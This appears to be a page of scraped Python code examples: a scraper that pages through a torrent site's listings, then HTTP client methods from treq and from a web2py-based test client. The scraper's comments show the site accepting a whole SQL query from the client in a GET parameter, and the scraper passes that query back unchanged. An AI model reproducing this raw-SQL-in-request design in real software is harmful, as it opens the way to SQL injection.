            itemlist.append( Item(channel=item.channel, action="findvideos" , title=title , url=url, thumbnail=thumbnail, plot=plot))

    # Página siguiente
    '''
    GET /include.inc/ajax.php/orderCategory.php?type=todo&leter=&sql=SELECT+DISTINCT+++%09%09%09%09%09%09torrentID%2C+++%09%09%09%09%09%09torrentCategoryID%2C+++%09%09%09%09%09%09torrentCategoryIDR%2C+++%09%09%09%09%09%09torrentImageID%2C+++%09%09%09%09%09%09torrentName%2C+++%09%09%09%09%09%09guid%2C+++%09%09%09%09%09%09torrentShortName%2C++%09%09%09%09%09%09torrentLanguage%2C++%09%09%09%09%09%09torrentSize%2C++%09%09%09%09%09%09calidad+as+calidad_%2C++%09%09%09%09%09%09torrentDescription%2C++%09%09%09%09%09%09torrentViews%2C++%09%09%09%09%09%09rating%2C++%09%09%09%09%09%09n_votos%2C++%09%09%09%09%09%09vistas_hoy%2C++%09%09%09%09%09%09vistas_ayer%2C++%09%09%09%09%09%09vistas_semana%2C++%09%09%09%09%09%09vistas_mes++%09%09%09%09++FROM+torrentsFiles+as+t+WHERE++(torrentStatus+%3D+1+OR+torrentStatus+%3D+2)++AND+(torrentCategoryID+IN+(1537%2C+758%2C+1105%2C+760%2C+1225))++++ORDER+BY+torrentDateAdded++DESC++LIMIT+0%2C+50&pag=3&tot=&ban=3&cate=1225 HTTP/1.1
    Host: www.newpct.com
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Referer: http://www.newpct.com/peliculas-castellano/peliculas-rip/
    Cookie: adbooth_popunder=5%7CSat%2C%2009%20Mar%202013%2018%3A23%3A22%20GMT
    Connection: keep-alive
    '''
    
    '''
    function orderCategory(type,leter,pag,other)
    {
        
        
        if(leter=='buscar')
        {
            leter = document.getElementById('word').value;
        }
        if(type=='todo')
        {
            document.getElementById('todo').className = "active_todo";
        }	
        if(type=='letter')
        {
            switch(leter)
            {
                case '09':
                document.getElementById('09').className = "active_num";
                break;
                default:
                document.getElementById(leter).className = "active_a";
                break;
            }
        }
        
        var parametros = {
                    "type" : type,
                    "leter" : leter,
                    "sql" : "SELECT DISTINCT   						torrentID,   						torrentCategoryID,   						torrentCategoryIDR,   						torrentImageID,   						torrentName,   						guid,   						torrentShortName,  						torrentLanguage,  						torrentSize,  						calidad as calidad_,  						torrentDescription,  						torrentViews,  						rating,  						n_votos,  						vistas_hoy,  						vistas_ayer,  						vistas_semana,  						vistas_mes  				  FROM torrentsFiles as t WHERE  (torrentStatus = 1 OR torrentStatus = 2)  AND (torrentCategoryID IN (1537, 758, 1105, 760, 1225))    ORDER BY torrentDateAdded  DESC  LIMIT 0, 50",
                    "pag" : pag,   
                    "tot" : '',
                    "ban" : '3',
                    "other": other,
                    "cate" : '1225'
                    
            };
        //alert(type+leter);
        
        $('#content-category').html('<div style="margin:100px auto;width:100px;height:100px;"><img src="http://www.newpct.com/images.inc/images/ajax-loader.gif"/></div>');
            var page = $(this).attr('data');        
            var dataString = 'page='+page;
            
         $.ajax({
              type: "GET",
              url:   'http://www.newpct.com/include.inc/ajax.php/orderCategory.php',
              data:  parametros,
              success: function(data) {
             
                    //Cargamos finalmente el contenido deseado
                    $('#content-category').fadeIn(1000).html(data);
              }
         });
         
    }
    '''
    if item.extra!="":
        bloque=item.extra
    else:
        bloque = scrapertools.get_match(data,"function orderCategory(.*?)\}\)\;")
    logger.info("bloque="+bloque)
    param_type=scrapertools.get_match(data,"<a href='javascript:;' onclick=\"orderCategory\('([^']+)'[^>]+> >> </a>")
    logger.info("param_type="+param_type)
    param_leter=scrapertools.get_match(data,"<a href='javascript:;' onclick=\"orderCategory\('[^']+','([^']*)'[^>]+> >> </a>")
    logger.info("param_leter="+param_leter)
    param_pag=scrapertools.get_match(data,"<a href='javascript:;' onclick=\"orderCategory\('[^']+','[^']*','([^']+)'[^>]+> >> </a>")
    logger.info("param_pag="+param_pag)
    param_total=scrapertools.get_match(bloque,'"total"\s*\:\s*\'([^\']+)')
    logger.info("param_sql="+param_total)
    param_sql=scrapertools.get_match(bloque,'"sql"\s*\:\s*\'([^\']+)')
    logger.info("param_sql="+param_sql)
    param_tot=scrapertools.get_match(bloque,"\"tot\"\s*\:\s*'([^']*)'")
    logger.info("param_tot="+param_tot)
    param_ban=scrapertools.get_match(bloque,"\"ban\"\s*\:\s*'([^']+)'")
    logger.info("param_ban="+param_ban)
    param_cate=scrapertools.get_match(bloque,"\"cate\"\s*\:\s*'([^']+)'")
    logger.info("param_cate="+param_cate)
    base_url = scrapertools.get_match(bloque,"url\s*\:\s*'([^']+)'")
    base_url = re.sub("../..", "http://www.newpct.com", base_url, count=1)
    logger.info("base_url="+base_url)
    #http://www.newpct.com/include.inc/ajax.php/orderCategory.php?type=todo&leter=&sql=SELECT+DISTINCT+++%09%09%09%09%09%09torrentID%2C+++%09%09%09%09%09%09torrentCategoryID%2C+++%09%09%09%09%09%09torrentCategoryIDR%2C+++%09%09%09%09%09%09torrentImageID%2C+++%09%09%09%09%09%09torrentName%2C+++%09%09%09%09%09%09guid%2C+++%09%09%09%09%09%09torrentShortName%2C++%09%09%09%09%09%09torrentLanguage%2C++%09%09%09%09%09%09torrentSize%2C++%09%09%09%09%09%09calidad+as+calidad_%2C++%09%09%09%09%09%09torrentDescription%2C++%09%09%09%09%09%09torrentViews%2C++%09%09%09%09%09%09rating%2C++%09%09%09%09%09%09n_votos%2C++%09%09%09%09%09%09vistas_hoy%2C++%09%09%09%09%09%09vistas_ayer%2C++%09%09%09%09%09%09vistas_semana%2C++%09%09%09%09%09%09vistas_mes++%09%09%09%09++FROM+torrentsFiles+as+t+WHERE++(torrentStatus+%3D+1+OR+torrentStatus+%3D+2)++AND+(torrentCategoryID+IN+(1537%2C+758%2C+1105%2C+760%2C+1225))++++ORDER+BY+torrentDateAdded++DESC++LIMIT+0%2C+50&pag=3&tot=&ban=3&cate=1225
    url_next_page = base_url + "?" + urllib.urlencode( {"total": param_total, "type": param_type, "leter": param_leter, "sql": param_sql, "pag": param_pag, "tot": param_tot, "ban": param_ban, "cate": param_cate} )
    logger.info("url_next_page="+url_next_page)
    if item.category == "serie":
        itemlist.append( Item(channel=item.channel, action="listado" , title=">> Página siguiente" , url=url_next_page, extra=bloque, category="serie", viewmode="movie_with_plot"))
    else:
        itemlist.append( Item(channel=item.channel, action="listado" , title=">> Página siguiente" , url=url_next_page, extra=bloque, viewmode="movie_with_plot"))

    return itemlist

Example 48

Project: treq
Source File: client.py
View license
    def request(self, method, url, **kwargs):
        method = method.encode('ascii').upper()

        # Join parameters provided in the URL
        # and the ones passed as argument.
        params = kwargs.get('params')
        if params:
            url = _combine_query_params(url, params)

        if isinstance(url, unicode):
            url = URL.fromText(url).asURI().asText().encode('ascii')

        # Convert headers dictionary to
        # twisted raw headers format.
        headers = kwargs.get('headers')
        if headers:
            if isinstance(headers, dict):
                h = Headers({})
                for k, v in headers.items():

                    if isinstance(k, unicode):
                        k = k.encode('ascii')

                    if isinstance(v, bytes):
                        h.addRawHeader(k, v)
                    elif isinstance(v, unicode):
                        h.addRawHeader(k, v.encode('ascii'))
                    elif isinstance(v, list):
                        cleanHeaders = []
                        for item in v:
                            if isinstance(item, unicode):
                                cleanHeaders.append(item.encode('ascii'))
                            else:
                                cleanHeaders.append(item)
                        h.setRawHeaders(k, cleanHeaders)
                    else:
                        h.setRawHeaders(k, v)

                headers = h
        else:
            headers = Headers({})

        # Here we choose a right producer
        # based on the parameters passed in.
        bodyProducer = None
        data = kwargs.get('data')
        files = kwargs.get('files')
        if files:
            # If the files keyword is present we will issue a
            # multipart/form-data request as it suits better for cases
            # with files and/or large objects.
            files = list(_convert_files(files))
            boundary = str(uuid.uuid4()).encode('ascii')
            headers.setRawHeaders(
                b'content-type', [
                    b'multipart/form-data; boundary=' + boundary])
            if data:
                data = _convert_params(data)
            else:
                data = []

            bodyProducer = multipart.MultiPartProducer(
                data + files, boundary=boundary)
        elif data:
            # Otherwise stick to x-www-form-urlencoded format
            # as it's generally faster for smaller requests.
            if isinstance(data, (dict, list, tuple)):
                headers.setRawHeaders(
                    b'content-type', [b'application/x-www-form-urlencoded'])
                data = urlencode(data, doseq=True)
            bodyProducer = self._data_to_body_producer(data)

        cookies = kwargs.get('cookies', {})

        if not isinstance(cookies, CookieJar):
            cookies = cookiejar_from_dict(cookies)

        cookies = merge_cookies(self._cookiejar, cookies)
        wrapped_agent = CookieAgent(self._agent, cookies)

        if kwargs.get('allow_redirects', True):
            if kwargs.get('browser_like_redirects', False):
                wrapped_agent = BrowserLikeRedirectAgent(wrapped_agent)
            else:
                wrapped_agent = RedirectAgent(wrapped_agent)

        wrapped_agent = ContentDecoderAgent(wrapped_agent,
                                            [(b'gzip', GzipDecoder)])

        auth = kwargs.get('auth')
        if auth:
            wrapped_agent = add_auth(wrapped_agent, auth)

        d = wrapped_agent.request(
            method, url, headers=headers,
            bodyProducer=bodyProducer)

        timeout = kwargs.get('timeout')
        if timeout:
            delayedCall = default_reactor(kwargs.get('reactor')).callLater(
                timeout, d.cancel)

            def gotResult(result):
                if delayedCall.active():
                    delayedCall.cancel()
                return result

            d.addBoth(gotResult)

        if not kwargs.get('unbuffered', False):
            d.addCallback(_BufferedResponse)

        return d.addCallback(_Response, cookies)

Example 49

Project: termite-data-server
Source File: webclient.py
View license
    def post(self, url, data=None, cookies=None,
             headers=None, auth=None, method='auto'):
        self.url = self.app + url

        # if this POST form requires a postback do it
        if data and '_formname' in data and self.postbacks and \
                self.history and self.history[-1][1] != self.url:
            # to bypass the web2py CSRF need to get formkey
            # before submitting the form
            self.get(url, cookies=cookies, headers=headers, auth=auth)

        # unless cookies are specified, recycle cookies
        if cookies is None:
            cookies = self.cookies
        cookies = cookies or {}
        headers = headers or {}

        cj = cookielib.CookieJar()
        args = [
            urllib2.HTTPCookieProcessor(cj),
            urllib2.HTTPHandler(debuglevel=0)
            ]
        # if required do basic auth
        if auth:
            auth_handler = urllib2.HTTPBasicAuthHandler()
            auth_handler.add_password(**auth)
            args.append(auth_handler)

        opener = urllib2.build_opener(*args)

        # copy headers from dict to list of key,value
        headers_list = []
        for key, value in self.default_headers.iteritems():
            if not key in headers:
                headers[key] = value
        for key, value in headers.iteritems():
            if isinstance(value, (list, tuple)):
                for v in value:
                    headers_list.append((key, v))
            else:
                headers_list.append((key, value))

        # move cookies to headers
        for key, value in cookies.iteritems():
            headers_list.append(('Cookie', '%s=%s' % (key, value)))

        # add headers to request
        for key, value in headers_list:
            opener.addheaders.append((key, str(value)))

        # assume everything is ok and make http request
        error = None
        try:
            if isinstance(data, str):
                self.method = 'POST' if method=='auto' else method
            elif isinstance(data, dict):
                self.method = 'POST' if method=='auto' else method
                # if there is only one form, set _formname automatically
                if not '_formname' in data and len(self.forms) == 1:
                    data['_formname'] = self.forms.keys()[0]

                # if there is no formkey but it is known, set it
                if '_formname' in data and not '_formkey' in data and \
                        data['_formname'] in self.forms:
                    data['_formkey'] = self.forms[data['_formname']]

                # time the POST request
                data = urllib.urlencode(data, doseq=True)
            else:
                self.method = 'GET' if method=='auto' else method
                data = None
            t0 = time.time()
            self.response = opener.open(self.url, data)
            self.time = time.time() - t0
        except urllib2.HTTPError, error:
            # catch HTTP errors
            self.time = time.time() - t0
            self.response = error

        if hasattr(self.response, 'getcode'):
            self.status = self.response.getcode()
        else:#python2.5
            self.status = None

        self.text = self.response.read()
        self.headers = dict(self.response.headers)

        # treat web2py tickets as special types of errors
        if error is not None:
            if 'web2py_error' in self.headers:
                raise RuntimeError(self.headers['web2py_error'])
            else:
                raise error

        # parse headers into cookies
        self.cookies = {}
        if 'set-cookie' in self.headers:
            for item in self.headers['set-cookie'].split(','):
                key, value = item[:item.find(';')].split('=')
            self.cookies[key.strip()] = value.strip()

        # check is a new session id has been issued, symptom of broken session
        if self.session_regex is not None:
            for cookie, value in self.cookies.iteritems():
                match = self.session_regex.match(cookie)
                if match:
                    name = match.group('name')
                    if name in self.sessions and self.sessions[name] != value:
                        print RuntimeError('Changed session ID %s' % name)
                    self.sessions[name] = value

        # find all forms and formkeys in page
        self.forms = {}
        for match in FORM_REGEX.finditer(self.text):
            self.forms[match.group('formname')] = match.group('formkey')

        # log this request
        self.history.append((self.method, self.url, self.status, self.time))

Example 50

Project: termite-visualizations
Source File: webclient.py
View license
    def post(self, url, data=None, cookies=None,
             headers=None, auth=None, method='auto'):
        self.url = self.app + url

        # if this POST form requires a postback do it
        if data and '_formname' in data and self.postbacks and \
                self.history and self.history[-1][1] != self.url:
            # to bypass the web2py CSRF need to get formkey
            # before submitting the form
            self.get(url, cookies=cookies, headers=headers, auth=auth)

        # unless cookies are specified, recycle cookies
        if cookies is None:
            cookies = self.cookies
        cookies = cookies or {}
        headers = headers or {}

        cj = cookielib.CookieJar()
        args = [
            urllib2.HTTPCookieProcessor(cj),
            urllib2.HTTPHandler(debuglevel=0)
            ]
        # if required do basic auth
        if auth:
            auth_handler = urllib2.HTTPBasicAuthHandler()
            auth_handler.add_password(**auth)
            args.append(auth_handler)

        opener = urllib2.build_opener(*args)

        # copy headers from dict to list of key,value
        headers_list = []
        for key, value in self.default_headers.iteritems():
            if not key in headers:
                headers[key] = value
        for key, value in headers.iteritems():
            if isinstance(value, (list, tuple)):
                for v in value:
                    headers_list.append((key, v))
            else:
                headers_list.append((key, value))

        # move cookies to headers
        for key, value in cookies.iteritems():
            headers_list.append(('Cookie', '%s=%s' % (key, value)))

        # add headers to request
        for key, value in headers_list:
            opener.addheaders.append((key, str(value)))

        # assume everything is ok and make http request
        error = None
        try:
            if isinstance(data,str):
                self.method = 'POST' if method=='auto' else method
            if isinstance(data, dict):
                self.method = 'POST' if method=='auto' else method
                # if there is only one form, set _formname automatically
                if not '_formname' in data and len(self.forms) == 1:
                    data['_formname'] = self.forms.keys()[0]

                # if there is no formkey but it is known, set it
                if '_formname' in data and not '_formkey' in data and \
                        data['_formname'] in self.forms:
                    data['_formkey'] = self.forms[data['_formname']]

                # time the POST request
                data = urllib.urlencode(data, doseq=True)
            else:
                self.method = 'GET' if method=='auto' else method
                data = None
            t0 = time.time()
            self.response = opener.open(self.url, data)
            self.time = time.time() - t0
        except urllib2.HTTPError, error:
            # catch HTTP errors
            self.time = time.time() - t0
            self.response = error

        if hasattr(self.response, 'getcode'):
            self.status = self.response.getcode()
        else:#python2.5
            self.status = None

        self.text = self.response.read()
        self.headers = dict(self.response.headers)

        # treat web2py tickets as special types of errors
        if error is not None:
            if 'web2py_error' in self.headers:
                raise RuntimeError(self.headers['web2py_error'])
            else:
                raise error

        # parse headers into cookies
        self.cookies = {}
        if 'set-cookie' in self.headers:
            for item in self.headers['set-cookie'].split(','):
                key, value = item[:item.find(';')].split('=')
            self.cookies[key.strip()] = value.strip()

        # check is a new session id has been issued, symptom of broken session
        if self.session_regex is not None:
            for cookie, value in self.cookies.iteritems():
                match = self.session_regex.match(cookie)
                if match:
                    name = match.group('name')
                    if name in self.sessions and self.sessions[name] != value:
                        print RuntimeError('Changed session ID %s' % name)
                    self.sessions[name] = value

        # find all forms and formkeys in page
        self.forms = {}
        for match in FORM_REGEX.finditer(self.text):
            self.forms[match.group('formname')] = match.group('formkey')

        # log this request
        self.history.append((self.method, self.url, self.status, self.time))